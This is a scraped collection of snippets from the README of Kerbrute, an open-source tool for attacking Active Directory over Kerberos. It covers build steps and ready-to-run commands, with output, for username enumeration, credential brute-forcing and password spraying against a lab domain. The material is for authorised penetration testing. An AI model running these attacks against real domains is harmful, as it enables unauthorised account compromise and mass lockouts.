### Install Kerbrute with Go Source: https://github.com/ropnop/kerbrute/blob/master/README.md Use this command to install Kerbrute directly using the Go toolchain. ```bash $ go get github.com/ropnop/kerbrute ``` -------------------------------- ### Kerbrute Makefile Help Source: https://github.com/ropnop/kerbrute/blob/master/README.md Displays available build targets for compiling Kerbrute using the Makefile. ```bash $ make help help: Show this help. windows: Make Windows x86 and x64 Binaries linux: Make Linux x86 and x64 Binaries mac: Make Darwin (Mac) x86 and x64 Binaries clean: Delete any binaries all: Make Windows, Linux and Mac x86/x64 Binaries ``` -------------------------------- ### Kerbrute Help Command Source: https://github.com/ropnop/kerbrute/blob/master/README.md Displays the main help information for the Kerbrute tool, including available commands and flags. This is useful for understanding the overall functionality and options. ```bash $ ./kerbrute -h __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/_\___/ Version: dev (bc1d606) - 11/15/20 - Ronnie Flathers @ropnop This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication. It is designed to be used on an internal Windows domain with access to one of the Domain Controllers. Warning: failed Kerberos Pre-Auth counts as a failed login and WILL lock out accounts Usage: kerbrute [command] Available Commands: bruteforce Bruteforce username:password combos, from a file or stdin bruteuser Bruteforce a single user's password from a wordlist help Help about any command passwordspray Test a single password against a list of users userenum Enumerate valid domain usernames via Kerberos version Display version info and quit Flags: --dc string The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS --delay int Delay in millisecond between each attempt. Will always use single thread if set -d, --domain string The full domain to use (e.g. contoso.com) --downgrade Force downgraded encryption type (arcfour-hmac-md5) --hash-file string File to save AS-REP hashes to (if any captured), otherwise just logged -h, --help help for kerbrute -o, --output string File to write logs to. Optional. --safe Safe mode. Will abort if any user comes back as locked out. Default: FALSE -t, --threads int Threads to use (default 10) -v, --verbose Log failures and errors Use "kerbrute [command] --help" for more information about a command. ``` -------------------------------- ### Compile Kerbrute for All Platforms Source: https://github.com/ropnop/kerbrute/blob/master/README.md Compiles Kerbrute binaries for Windows, Linux, and macOS for both 386 and amd64 architectures. ```bash $ make all Done. Building for windows amd64.. Building for windows 386.. Done. Building for linux amd64... Building for linux 386... Done. Building for mac amd64... Building for mac 386... Done. ``` -------------------------------- ### Kerbrute Compiled Binaries Source: https://github.com/ropnop/kerbrute/blob/master/README.md Lists the compiled binaries generated in the 'dist/' directory after running 'make all'. ```bash $ ls dist/ kerbrute_darwin_386 kerbrute_linux_386 kerbrute_windows_386.exe kerbrute_darwin_amd64 kerbrute_linux_amd64 kerbrute_windows_amd64.exe ``` -------------------------------- ### Brute Force User:Password Combinations with Kerbrute Source: https://github.com/ropnop/kerbrute/blob/master/README.md Test username and password combinations from a file or stdin using Kerberos PreAuthentication. This mode skips blank lines or entries with blank usernames/passwords and generates Kerberos event IDs for failed pre-authentication. ```bash $ cat combos.lst | ./kerbrute -d lab.ropnop.com bruteforce - __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\/_/ Version: dev (n/a) - 05/11/19 - Ronnie Flathers @ropnop 2019/05/11 18:40:56 > Using KDC(s): 2019/05/11 18:40:56 > pdc01.lab.ropnop.com:88 2019/05/11 18:40:56 > [+] VALID LOGIN: athomas@lab.ropnop.com:Password1234 2019/05/11 18:40:56 > Done! Tested 7 logins (1 successes) in 0.114 seconds ``` -------------------------------- ### Enumerate Usernames with Kerbrute Source: https://github.com/ropnop/kerbrute/blob/master/README.md Use this command to enumerate valid usernames by sending TGT requests without pre-authentication. It checks for 'PRINCIPAL UNKNOWN' errors to determine non-existent users. This method does not cause login failures. ```bash root@kali:~# ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\/_/ Version: dev (43f9ca1) - 03/06/19 - Ronnie Flathers @ropnop 2019/03/06 21:28:04 > Using KDC(s): 2019/03/06 21:28:04 > pdc01.lab.ropnop.com:88 2019/03/06 21:28:04 > [+] VALID USERNAME: amata@lab.ropnop.com 2019/03/06 21:28:04 > [+] VALID USERNAME: thoffman@lab.ropnop.com 2019/03/06 21:28:04 > Done! Tested 1001 usernames (2 valid) in 0.425 seconds ``` -------------------------------- ### Brute Force Single User with Kerbrute Source: https://github.com/ropnop/kerbrute/blob/master/README.md Execute a traditional brute-force attack against a specific username with a list of passwords. Use with caution, as this can lead to account lockouts if a lockout policy is in effect. Generates Kerberos pre-authentication failed events. ```bash root@kali:~# ./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\/_/ Version: dev (43f9ca1) - 03/06/19 - Ronnie Flathers @ropnop 2019/03/06 21:38:24 > Using KDC(s): 2019/03/06 21:38:24 > pdc01.lab.ropnop.com:88 2019/03/06 21:38:27 > [+] VALID LOGIN: thoffman@lab.ropnop.com:Summer2017 2019/03/06 21:38:27 > Done! Tested 1001 logins (1 successes) in 2.711 seconds ``` -------------------------------- ### Password Spray Attack with Kerbrute Source: https://github.com/ropnop/kerbrute/blob/master/README.md Perform a horizontal brute-force attack against a list of domain users with a single password. This is useful for testing common passwords against many users. WARNING: This can lead to account lockouts and generates specific Kerberos event IDs. ```bash root@kali:~# ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123 __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\/_/ Version: dev (43f9ca1) - 03/06/19 - Ronnie Flathers @ropnop 2019/03/06 21:37:29 > Using KDC(s): 2019/03/06 21:37:29 > pdc01.lab.ropnop.com:88 2019/03/06 21:37:35 > [+] VALID LOGIN: callen@lab.ropnop.com:Password123 2019/03/06 21:37:37 > [+] VALID LOGIN: eshort@lab.ropnop.com:Password123 2019/03/06 21:37:37 > Done! Tested 2755 logins (2 successes) in 7.674 seconds ``` === COMPLETE CONTENT === This response contains all available snippets from this library. No additional content exists. Do not make further requests.